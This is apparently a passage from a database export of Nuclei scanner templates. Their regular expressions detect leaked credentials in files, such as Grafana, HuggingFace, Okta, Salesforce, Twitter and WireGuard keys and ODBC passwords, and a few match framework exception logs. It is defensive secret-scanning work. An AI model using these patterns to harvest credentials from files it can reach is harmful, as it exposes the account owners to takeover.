4a0a0047304502204d6ddfacde924e20772b34f26f8f705be85f7bf5bc9078c729a7f7edc99a9dcf022100a64c8e922783d1374f6cbc1f132b56a1efd3de3c59a2ed6ba3d3266225e7ffa4:922c64590222798bb761d5b6d8e72950", "hash": "e17a5e2b8cf444dca67f3959a58d6b6c", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d4e" }, "name": "google-oauth-clientsecret.yaml", "content": "id: google-oauth-clientsecret\n\ninfo:\n name: Google OAuth Client Secret (prefixed)\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/google.yml\n metadata:\n verified: true\n tags: file,keys,google,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '(GOCSPX-[a-zA-Z0-9_-]{28})'\n# digest: 4a0a004730450220157b3e82f90478510f0f71167cfa1f517878cfc309707142fa439d38149c8a1a022100a54beacb6de85b38bddad57f4d7090ba367df0825c9c4fbfa165f7cb8ae0d4e9:922c64590222798bb761d5b6d8e72950", "hash": "0c37b9ce1adbf7ba7429b7ac49015e02", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d4f" }, "name": "grafana-api-key.yaml", "content": "id: grafana-api-key\n\ninfo:\n name: Grafana API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-api-key.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-api-key.go\n metadata:\n verified: true\n tags: grafana,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)\\b(eyJrIjoi[A-Za-z0-9]{70,400}={0,2})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n\n# digest: 4a0a00473045022100f94f26615c01ee3669910469b31e0011b160852246ed76ae9802f34d6be1911c022076cd3f3e6b5257f59db3fb098baf801c44b0a628196d408b70d1765bb646a7c9:922c64590222798bb761d5b6d8e72950\n", "hash": "99f9b461940bf67632dce85f13b95876", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d50" }, "name": "grafana-cloud-api-token.yaml", "content": "id: grafana-cloud-api-token\n\ninfo:\n name: Grafana Cloud API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-cloud-api-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-cloud-api-token.go\n metadata:\n verified: true\n tags: grafana,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)\\b(glc_[A-Za-z0-9+/]{32,400}={0,2})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n\n# digest: 4a0a00473045022100ac8747d010f2f8ecbbf15e54c1a4f79e1e965927e8077c7e25d72c003adf0d9a02205ec44b2c0ae24af123d96ec3b31d842f77287892e7f1f5a92d08a213dd5af080:922c64590222798bb761d5b6d8e72950\n", "hash": "73b3eeb25e0da99b39baf70b6574be11", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d51" }, "name": "grafana-service-account-token.yaml", "content": "id: grafana-service-account-token\n\ninfo:\n name: Grafana Service Account Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-service-account-token.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/grafana-service-account-token.go\n metadata:\n verified: true\n tags: grafana,file,keys\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)\\b(glsa_[A-Za-z0-9]{32}_[A-Fa-f0-9]{8})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n\n# digest: 4b0a00483046022100d0d2caaae6ee74a09fb5d24db235ba021d75800eafa6dbc83777ac9213de0eff022100f4dde19703abd7a8925d6b3dbcfa20ac5d7e72e6f670baed1ea04e57e3fdfd5a:922c64590222798bb761d5b6d8e72950\n", "hash": "947852b2edab9cb91b4e585bee0d3f67", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d52" }, "name": "huggingface-user-access.yaml", "content": "id: huggingface-user-access\n\ninfo:\n name: HuggingFace User Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/huggingface.yml\n - https://huggingface.co/docs/hub/security-tokens\n metadata:\n verified: true\n tags: huggingface,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\b(hf_[a-zA-Z]{34})\\b'\n# digest: 4b0a00483046022100934e5db46a96a95fbd52e60737825b1ed564ae6f42363a5843a5317f25c8b15d0221008fd6451b353118cd6c0b7a054f49e79c36d5c4222658de97e4b5fea6731da789:922c64590222798bb761d5b6d8e72950", "hash": "c84b3e14a3fbc85a0ff50e4ad76c5375", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d53" }, "name": "kubernetes-dockercfg-secret.yaml", "content": "id: kubernetes-dockercfg-secret\n\ninfo:\n name: kubernetes.io/dockercfg Secret\n author: dwisiswant0\n severity: info\n reference:\n - https://blog.aquasec.com/the-ticking-supply-chain-attack-bomb-of-exposed-kubernetes-secrets\n metadata:\n verified: true\n tags: kubernetes,k8s,file,keys,secret\n\nfile:\n - extensions:\n - yaml\n - yml\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\.dockercfg:\\s+[\"']?e(w|y)[\\w=]+[\"']?\n# digest: 4b0a0048304602210084bb6909a2c7963a555e1075de093962ffd4e4b125d3dd1bb559eccf252e697c022100d2e745493ab0b3a250e96f74744924d34f1cb1cf18b265e81ebba442c3eb52ad:922c64590222798bb761d5b6d8e72950", "hash": "c89a5eb4d2d45b32fa613e99f798f748", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d54" }, "name": "kubernetes-dockerconfigjson-secret.yaml", "content": "id: kubernetes-dockerconfigjson-secret\n\ninfo:\n name: kubernetes.io/dockerconfigjson Secret\n author: dwisiswant0\n severity: info\n reference:\n - https://blog.aquasec.com/the-ticking-supply-chain-attack-bomb-of-exposed-kubernetes-secrets\n metadata:\n verified: true\n tags: kubernetes,k8s,file,keys,secret\n\nfile:\n - extensions:\n - yaml\n - yml\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\.dockerconfigjson:\\s+[\"']?e(w|y)[\\w=]+[\"']?\n# digest: 490a0046304402205837efe22bf2818e0eff1697ee0cfa3f5e769e3c20fa63e1291c6243d921daa202207523ce58ac252a1a71bbbf192eb381aa08631c976b1860127bf5e77441876053:922c64590222798bb761d5b6d8e72950", "hash": "73e98f1e0efb2ba0dbc4ea18f67934e6", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d55" }, "name": "linkedin-client.yaml", "content": "id: linkedin-client\n\ninfo:\n name: LinkedIn Client ID\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/linkedin.yml\n - https://docs.microsoft.com/en-us/linkedin/shared/api-guide/best-practices/secure-applications\n metadata:\n verified: true\n tags: linkedin,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)linkedin.?(?:api|app|application|client|consumer|customer)?.?(?:id|identifier|key).{0,2}\\s{0,20}.{0,2}\\s{0,20}.{0,2}\\b([a-z0-9]{12,14})\\b\n# digest: 4a0a00473045022100ade417f9932824017914990383cd867a37ba57dd1badc60aa55dac97e73cbf3f02203bb0babcad422204af64f70926c18827b3940c69f909d205f440468d18b0bb31:922c64590222798bb761d5b6d8e72950", "hash": "360286b5986f7bf74706d1b70ad1a784", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d56" }, "name": "linkedin-secret.yaml", "content": "id: linkedin-secret\n\ninfo:\n name: LinkedIn Secret Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/linkedin.yml\n - https://docs.microsoft.com/en-us/linkedin/shared/api-guide/best-practices/secure-applications\n metadata:\n verified: true\n tags: linkedin,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)linkedin.?(?:api|app|application|client|consumer|customer|secret|key).?(?:key|oauth|sec|secret)?.{0,2}\\s{0,20}.{0,2}\\s{0,20}.{0,2}\\b([a-z0-9]{16})\\b\n# digest: 4a0a0047304502205def151b767d6270018ea90666e56089b0dde70467ca94489c6ab9ec0b735fe2022100ea3cee5471199b7e21bd6a63b75a667adcddad7281d249e83cbb8eb8cda82fd7:922c64590222798bb761d5b6d8e72950", "hash": "6d501d408c3c8f5e95502706ac453ec9", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d57" }, "name": "newrelic-api-service.yaml", "content": "id: newrelic-api-service\n\ninfo:\n name: New Relic API Service Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/newrelic.yml\n - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys\n - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys/#user-key\n metadata:\n verified: true\n tags: newrelic,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)\\b(nrak-[a-z0-9]{27})\\b\n# digest: 4a0a00473045022100b0305a1f0644ca813e1b1408183fb6100e36a5ccf5716a072f32d60cf9956d7102207b59c7dc0411cc69bf362c9a1035ac73c61bccbabbbfeea75aa3eff7db628214:922c64590222798bb761d5b6d8e72950", "hash": "c850dffea93a4a266cb1cb9aa5c9392b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d58" }, "name": "newrelic-license-non.yaml", "content": "id: newrelic-license-non\n\ninfo:\n name: New Relic License Key (non-suffixed)\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/newrelic.yml\n - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys\n - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys/#license-key\n metadata:\n verified: true\n tags: newrelic,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)associated\\ with\\ your\\ New\\ Relic\\ account\\.\\s+license_key:\\s*([a-f0-9]{40})\\b\n# digest: 4b0a00483046022100cb892d11153aa7205e3a23dab514da50e195f959de8fc957589d622d9ab5cc2b0221008328f65ee06dc78d96499d42170e2fb036cfa2aacb467698c39c672dc53cba96:922c64590222798bb761d5b6d8e72950", "hash": "cee46f147ba1aa267bd612120ad82fc4", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d59" }, "name": "newrelic-license.yaml", "content": "id: newrelic-license\n\ninfo:\n name: New Relic License Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/newrelic.yml\n - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys\n - https://docs.newrelic.com/docs/apis/intro-apis/new-relic-api-keys/#license-key\n metadata:\n verified: true\n tags: newrelic,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)\\b([a-z0-9]{6}[a-f0-9]{30}nral)\\b\n# digest: 4b0a00483046022100e041b8d63bb59009c36c1d2f8b42a95d352acb3c8d0345afae5b908a78ab8f090221009e2de0a5b782aa3b65c7cbf357c0c7cd47497bef6ade233b239afa63ff863fff:922c64590222798bb761d5b6d8e72950", "hash": "8e919a66290e3ae1da870c058fb1b2c4", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d5a" }, "name": "newrelic-pixie-apikey.yaml", "content": "id: newrelic-pixie-apikey\n\ninfo:\n name: New Relic Pixie API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/newrelic.yml\n - https://docs.px.dev/reference/admin/api-keys/\n metadata:\n verified: true\n tags: file,keys,newrelic,pixie,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \"(px-api-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})\"\n# digest: 4a0a00473045022100c87ef60160177e4dd9cf059f2a4fb1feb922f1dc810beec9f3153393645edb8d0220317d229ff5d7af76fce023056bc85f19f45ff91efeb256c4fca4137237156ad0:922c64590222798bb761d5b6d8e72950", "hash": "57193e44b062d0103f946505365ab833", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d5b" }, "name": "newrelic-pixie-deploykey.yaml", "content": "id: newrelic-pixie-deploykey\n\ninfo:\n name: New Relic Pixie Deploy Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/newrelic.yml\n - https://docs.px.dev/reference/admin/api-keys/\n metadata:\n verified: true\n tags: file,keys,newrelic,pixie,token\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \"(px-dep-[a-f0-9]{8}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{4}-[a-f0-9]{12})\"\n# digest: 4a0a0047304502203c71b329d4ef2552fb587dfa8d1a5717b95763f35295f0d2cb52eee420376850022100ac94ca2b4d48c633bf969eebd6fcbaff6894322bda4e05bce3129184cbfdd205:922c64590222798bb761d5b6d8e72950", "hash": "6385c3d00c62c6972e0a310530d66cac", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d5c" }, "name": "odbc-connection.yaml", "content": "id: odbc-connection\n\ninfo:\n name: ODBC Connection String\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/odbc.yml\n metadata:\n verified: true\n tags: odbc,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:User|User\\sId|UserId|Uid)\\s*=\\s*([^\\s;]{3,100})\\s*;[\\ \\t]*.{0,10}[\\ \\t]*(?:Password|Pwd)\\s*=\\s*([^\\t\\ ;]{3,100})\\s*(?:[;]|$)\n# digest: 4a0a004730450221009cdd18eb9c779b2230d9b141a315ef98d1da77f0173be2da4d099c46e3b5c46f02207ae6fac5ccfbcbe6ab6902e3e4431449873bf31680040ec3b616c0e3750e1c4d:922c64590222798bb761d5b6d8e72950", "hash": "dc06075f2af490275a24dc24eba81587", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d5d" }, "name": "okta-api.yaml", "content": "id: okta-api\n\ninfo:\n name: Okta API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/okta.yml\n - https://devforum.okta.com/t/api-token-length/5519\n - https://developer.okta.com/docs/guides/create-an-api-token/main/\n metadata:\n verified: true\n tags: okta,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?s)(?:okta|ssws).{0,40}\\b(00[a-z0-9_-]{39}[a-z0-9_])\\b\n# digest: 4b0a0048304602210099f31a1c5cf66963fb04f1f4a78317a1329098914e756d1a97879086ca81de74022100c51328ddf041ad3e06759c5ce691eed371adf63ef1c6d203b2a50d87b165b1f9:922c64590222798bb761d5b6d8e72950", "hash": "4b9ad57ad90b18b09b3e0e200ff3fb07", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d5e" }, "name": "particle-access.yaml", "content": "id: particle-access\n\ninfo:\n name: particle.io Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/particle.io.yml\n - https://docs.particle.io/reference/cloud-apis/api/\n metadata:\n verified: true\n tags: particle,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - 'https://api\\.particle\\.io/v1/[a-zA-Z0-9_\\-\\s/\"\\\\?]*(?:access_token=|Authorization:\\s*Bearer\\s*)\\b([a-zA-Z0-9]{40})\\b'\n - '(?:access_token=|Authorization:\\s*Bearer\\s*)\\b([a-zA-Z0-9]{40})\\b[\\s\"\\\\]*https://api\\.particle\\.io/v1'\n# digest: 4b0a00483046022100a93af0a2a59859c973d5551ca538c3445e1bbdcdb6ffae6bb511031ab0920b6e022100b5528e182489365a2d48d40ff6ef41f6b79a28fa270c311e4fe6f767e45e4414:922c64590222798bb761d5b6d8e72950", "hash": "d90177006b565c08440c816c334f3f54", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d5f" }, "name": "reactapp-password.yaml", "content": "id: reactapp-password\n\ninfo:\n name: React App Password\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/react.yml\n - https://create-react-app.dev/docs/adding-custom-environment-variables/\n - https://stackoverflow.com/questions/48699820/how-do-i-hide-an-api-key-in-create-react-app\n metadata:\n verified: true\n tags: react,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\bREACT_APP(?:_[A-Z0-9]+)*_PASS(?:\\s+WORD)?\\s*=\\s*['\"]?([^\\s'\"$]{6,})(?:[\\s'\"$]|$)\n# digest: 4b0a00483046022100b4791a0989f14242e6ffe187281643b8b1417e5aba7fe98f353e37dbdc2ffb6c022100c3eee981ff792f8372f7f9292d0e73e0718b69a12d6d40ba0a58dff15dc3f948:922c64590222798bb761d5b6d8e72950", "hash": "d0c0375597265ce974c06673019a6414", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d60" }, "name": "reactapp-username.yaml", "content": "id: reactapp-username\n\ninfo:\n name: React App Username\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/react.yml\n - https://create-react-app.dev/docs/adding-custom-environment-variables/\n - https://stackoverflow.com/questions/48699820/how-do-i-hide-an-api-key-in-create-react-app\n metadata:\n verified: true\n tags: react,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\bREACT_APP(?:_[A-Z0-9]+)*_USER(?:\\s+NAME)?\\s*=\\s*['\"]?([^\\s'\"$]{3,})(?:[\\s'\"$]|$)\n# digest: 4a0a0047304502201077003a86f122901374676e5f9dfda39f6c54f870a6e4f12b7dd01707a3a5e2022100c998646fe193fa833a18772b90679efa1ba4cca48a55a2da1c839b79e50b4cfd:922c64590222798bb761d5b6d8e72950", "hash": "9a9f2767d2759460f5a447b3c4b90c49", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d61" }, "name": "salesforce-access.yaml", "content": "id: salesforce-access\n\ninfo:\n name: Salesforce Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/salesforce.yml\n metadata:\n verified: true\n tags: salesforce,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\b(00[a-zA-Z0-9]{13}![a-zA-Z0-9._]{96})(?:\\b|$|[^a-zA-Z0-9._])\n# digest: 490a0046304402207a4efb9c2401eaa2ebf49fcc5ec4676dfc142a5f5d607777827383c94bf144f102207b75489de473e1c5e3264e2d664fbb87cecbfc5811b20e6ac658fcd3f1415806:922c64590222798bb761d5b6d8e72950", "hash": "2f406ef7f2d8968b4584276c910ad32d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d62" }, "name": "thingsboard-access.yaml", "content": "id: thingsboard-access\n\ninfo:\n name: ThingsBoard Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/thingsboard.yml\n - https://thingsboard.io/docs/paas/reference/http-api/\n - https://thingsboard.io/docs/paas/reference/coap-api/\n metadata:\n verified: true\n tags: thingsboard,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - thingsboard\\.cloud/api/v1/([a-z0-9]{20})\n# digest: 4b0a00483046022100e85330533e34d275242ad231bb436951116dabe56acafa94f3db46fca45ed3ae022100a799502b27b8e16f77e8406be58127578dd5f3465dab8b0a2381ee944432c239:922c64590222798bb761d5b6d8e72950", "hash": "79e353d2c98594f7b25b32b377b04fd5", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d63" }, "name": "truenas-api.yaml", "content": "id: truenas-api\n\ninfo:\n name: TrueNAS API Key (WebSocket)\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/truenas.yml\n - https://www.truenas.com/docs/api/core_websocket_api.html\n - https://www.truenas.com/docs/api/scale_rest_api.html\n - https://www.truenas.com/docs/scale/scaletutorials/toptoolbar/managingapikeys/\n - https://www.truenas.com/docs/scale/scaleclireference/auth/cliapikey/\n - https://www.truenas.com/docs/scale/api/\n - https://www.truenas.com/community/threads/api-examples-in-perl-python.108053/\n metadata:\n verified: true\n tags: truenas,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\"params\"\\s*:\\s*\\[\\s*\"(\\d+-[a-zA-Z0-9]{64})\"\\s*\\]'\n# digest: 490a0046304402207bb4c8c5d8688099a5fb0972662080602259b4356fa5f947f6bf7ace68af235702201273f66e211b1ddfafc26dd957bc970aa1b23f7c0de5c142347e4d83f5ce1b49:922c64590222798bb761d5b6d8e72950", "hash": "cfc8c228b1928d302835f1bf246b6560", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d64" }, "name": "twitter-client.yaml", "content": "id: twitter-client\n\ninfo:\n name: Twitter Client ID\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/twitter.yml\n - https://developer.twitter.com/en/docs/authentication/overview\n metadata:\n verified: true\n tags: twitter,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)\\btwitter.?(?:api|app|application|client|consumer|customer)?.?(?:id|identifier|key).{0,2}\\s{0,20}.{0,2}\\s{0,20}.{0,2}\\b([a-z0-9]{18,25})\\b\n# digest: 4a0a00473045022030cb9bb226fc38ff17accc2fbe89603cae16c35050ec725ad20ce14d5fbc5ad2022100860577843f28d261d7fbf35ef59577e5fd0e84a50eb370cfbd714f1039338c19:922c64590222798bb761d5b6d8e72950", "hash": "1b0c0dfd77659475cc6b2dce502eb2b5", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d65" }, "name": "twitter-secret.yaml", "content": "id: twitter-secret\n\ninfo:\n name: Twitter Secret Key\n author: DhiyaneshDK,gaurang,daffainfo\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/twitter.yml\n - https://developer.twitter.com/en/docs/authentication/overview\n metadata:\n verified: true\n tags: twitter,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)twitter.?(?:api|app|application|client|consumer|customer|secret|key).?(?:key|oauth|sec|secret)?.{0,2}\\s{0,20}.{0,2}\\s{0,20}.{0,2}\\b([a-z0-9]{35,44})\\b\n# digest: 4a0a00473045022100ae8d7dcc6d380f9b0ba6d16ca558e7af6254078b3f1a0a2230f8ddc28f47267102206348551061cffebd4da2b42ec393373ef0987eeeb4382f0e517c38c836fb46cf:922c64590222798bb761d5b6d8e72950", "hash": "8aaac58f6ca5fefbde44156e3d3b13ce", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d66" }, "name": "wireguard-preshared.yaml", "content": "id: wireguard-preshared\n\ninfo:\n name: WireGuard Preshared Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/wireguard.yml\n - https://www.wireguard.com/quickstart/\n - https://manpages.debian.org/testing/wireguard-tools/wg.8.en.html\n - https://gist.github.com/lanceliao/5d2977f417f34dda0e3d63ac7e217fd\n metadata:\n verified: true\n tags: wireguard,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - PresharedKey\\s*=\\s*([A-Za-z0-9+/]{43}=)\n# digest: 4a0a00473045022055b7809c89c44f01db811de03d659329878fabbb6006f65a5cfc4c231e72b5ce022100916852a09714e7cf50f5e239c48dba2b243d889df28c54c7671cb3b0ec8dc9e5:922c64590222798bb761d5b6d8e72950", "hash": "f7c4cd0b00a362669d518b104e71cc78", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d67" }, "name": "wireguard-private.yaml", "content": "id: wireguard-private\n\ninfo:\n name: WireGuard Private Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/wireguard.yml\n - https://www.wireguard.com/quickstart/\n - https://manpages.debian.org/testing/wireguard-tools/wg.8.en.html\n - https://gist.github.com/lanceliao/5d2977f417f34dda0e3d63ac7e217fd\n metadata:\n verified: true\n tags: wireguard,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - PrivateKey\\s*=\\s*([A-Za-z0-9+/]{43}=)\n# digest: 4a0a004730450221008bd7fd7c9c74eb3c6d2f1d5e4c8cc9c0fcc230534b094814ee0ca7dff2f7f9800220688ed7ae288880609a373ea69defa1d5ed93ca3fcb312e5c4ea2acea46b2e27c:922c64590222798bb761d5b6d8e72950", "hash": "714d36bd1a4aa5902fd2d8fd92b48b3d", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d68" }, "name": "django-framework-exceptions.yaml", "content": "id: django-framework-exceptions\n\ninfo:\n name: Django Framework Exceptions\n author: geeknik\n severity: medium\n description: Detects suspicious Django web application framework exceptions that could indicate exploitation attempts\n reference:\n - https://docs.djangoproject.com/en/1.11/ref/exceptions/\n - https://docs.djangoproject.com/en/1.11/topics/logging/#django-security\n tags: file,logs,django\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n name: exception\n part: body\n regex:\n - 'SuspiciousOperation'\n - 'DisallowedHost'\n - 'DisallowedModelAdminLookup'\n - 'DisallowedModelAdminToField'\n - 'DisallowedRedirect'\n - 'InvalidSessionKey'\n - 'RequestDataTooBig'\n - 'SuspiciousFileOperation'\n - 'SuspiciousMultipartForm'\n - 'SuspiciousSession'\n - 'TooManyFieldsSent'\n - 'PermissionDenied'\n\n# digest: 4a0a0047304502205f33a921687fc710f1271b09e50c6f9fbca2ca07919f6239a8972da5e80e4ece022100bfc39ac2cdb85b270eb0d92321b0809a68df57f8956a06dcaf6ac4a1e4b87e2f:922c64590222798bb761d5b6d8e72950\n", "hash": "c8f6fb7c96606d34cea2d1c616f6f59a", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d69" }, "name": "python-app-sql-exceptions.yaml", "content": "id: python-app-sql-exceptions\n\ninfo:\n name: Python App - SQL Exception\n author: geeknik\n severity: medium\n description: A generic SQL exception was discovered in Python according to PEP 249.\n reference:\n - https://www.python.org/dev\n - https://peps.python.org/pep-0249/\n tags: file,logs,python,sql\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n name: exception\n part: body\n regex:\n - 'DataError'\n - 'IntegrityError'\n - 'ProgrammingError'\n - 'OperationalError'\n\n# digest: 4a0a00473045022079a46e42dc0321daff4fa00b021a299f5f746c2faed50fcba78acb826f35b261022100e777c196aed8119194c365ea967487c6795b47902f0d29873ade5a16fc1125cd:922c64590222798bb761d5b6d8e72950\n", "hash": "6c48420820965e8b59045e97f4f557f4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d6a" }, "name": "ruby-on-rails-framework-exceptions.yaml", "content": "id: ruby-on-rails-framework-exceptions\n\ninfo:\n name: Ruby on Rails Framework Exceptions\n author: geeknik\n severity: medium\n description: Detects suspicious Ruby on Rails exceptions that could indicate exploitation attempts\n reference:\n - http://edgeguides.rubyonrails.org/security.html\n - http://guides.rubyonrails.org/action_controller_overview.html\n - https://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception\n - https://github.com/rails/rails/blob/master/actionpack/lib/action_dispatch/middleware/exception_wrapper.rb\n tags: 